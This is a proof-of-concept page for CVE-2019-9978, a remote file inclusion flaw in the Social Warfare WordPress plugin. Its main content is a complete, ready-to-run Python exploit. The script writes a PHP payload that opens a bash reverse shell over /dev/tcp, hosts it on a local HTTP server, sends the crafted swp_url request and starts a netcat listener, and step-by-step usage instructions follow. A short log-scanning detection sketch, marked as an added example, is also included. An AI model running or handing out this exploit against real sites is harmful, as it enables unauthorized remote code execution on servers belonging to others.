CVE-2019-9978 PoC — WordPress social-warfare plugin cross-site scripting vulnerability

Associated Vulnerability
Title: WordPress social-warfare plugin cross-site scripting vulnerability (CVE-2019-9978)
Description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
Readme
# CVE-2019-9978 - Social Warfare WordPress Plugin RCE

This repository contains a working Python exploit for [CVE-2019-9978](https://nvd.nist.gov/vuln/detail/CVE-2019-9978), a remote code execution vulnerability in the Social Warfare plugin for WordPress (version <= 3.5.2).

## Description

The `swp_debug` parameter in `admin-post.php` allows remote attackers to include external files containing malicious PHP code, which are evaluated on the server. By supplying a crafted URL that hosts a reverse shell payload, an attacker can gain command execution.
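
The request described above leaves a recognizable entry in web server access logs. The following detection sketch is an added example, not code from this repository: it flags requests to `admin-post.php` that carry `swp_debug`, and rates them `high` when `swp_url` points at an external resource. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format prefix: client IP ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def safe_split(value):
    """urlsplit that returns an empty result instead of raising on malformed input."""
    try:
        return urlsplit(value.strip())
    except ValueError:
        return urlsplit("")

def classify(line):
    """Return None for unrelated lines, else a dict describing the swp_debug request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = safe_split(m["target"])
    # parse_qs percent-decodes names and values, so encoded variants still match.
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/wp-admin/admin-post.php") or "swp_debug" not in params:
        return None
    remote = [u for u in params.get("swp_url", [])
              if safe_split(u).scheme.lower() in ("http", "https", "ftp")]
    return {"client": m["ip"], "status": int(m["status"]),
            "swp_debug": params["swp_debug"][0], "remote_urls": remote,
            "severity": "high" if remote else "review"}

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Mar/2019:10:02:11 +0000] "GET /wp-admin/admin-post.php'
    '?swp_debug=load_options&swp_url=http://198.51.100.7:8000/payload.txt HTTP/1.1" 200 512',
    '198.51.100.23 - - [21/Mar/2019:10:05:40 +0000] "GET /blog/wp-admin/admin-post.php'
    '?swp_debug=load_options&swp_url=https%3A%2F%2Fexample.net%2Fo.txt HTTP/1.1" 200 498',
    '203.0.113.9 - - [21/Mar/2019:10:06:02 +0000] "GET /wp-admin/admin-post.php'
    '?swp_debug=load_options HTTP/1.1" 200 0',
    '192.0.2.44 - - [21/Mar/2019:10:07:15 +0000] "POST /wp-admin/admin-post.php'
    '?action=save_form HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `high` hit against a site running a plugin version before 3.5.3 means the server was asked to fetch and evaluate remote content, so it should be triaged as a possible compromise and the plugin updated.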

## Exploit Features

- Hosts a PHP payload using Python's built-in HTTP server.
- Sends a malicious `swp_url` parameter to trigger RCE.
- Starts a Netcat listener to catch the reverse shell.
- Automatically writes the payload with the correct escaping for successful code execution.

## Requirements

- Python 3.x
- Netcat
- Local DNS resolution for the target domain (e.g. `example.com` mapped to target IP)

## Exploit Code

```python
#!/usr/bin/env python3

import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"

def create_payload():
    """Write exact reverse shell payload using valid PHP syntax"""
    payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
    with open(PAYLOAD_FILE, "w") as f:
        f.write(payload)
    print(f"[+] Payload written to {PAYLOAD_FILE}")

def start_http_server():
    """Serve payload over HTTP"""
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
        print(f"[+] HTTP server running at port {HTTP_PORT}")
        httpd.serve_forever()

def start_listener():
    """Start Netcat listener"""
    print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
    subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])

def send_exploit():
    """Trigger the exploit with vulnerable parameter"""
    payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
    exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
    print(f"[+] Sending exploit: {exploit}")
    try:
        requests.get(exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass

def main():
    create_payload()

    # Start web server in background
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    time.sleep(2)  # Give server time to start

    # Start listener in background
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
    time.sleep(1)

    # Send the malicious request
    send_exploit()

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[-] Interrupted by user.")
```

## Usage

1. Update `ATTACKER_IP` and `LISTEN_PORT` to your machine’s IP and desired port.
2. Ensure the target resolves `example.com` to the correct IP.
3. Run the script:

```bash
python3 exploit.py
```

4. Catch the reverse shell in your listener.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2019-9978
- https://github.com/hash3liZer/CVE-2019-9978

## Disclaimer

This exploit is provided for **educational purposes only**. Do not use it without explicit permission on any system you do not own.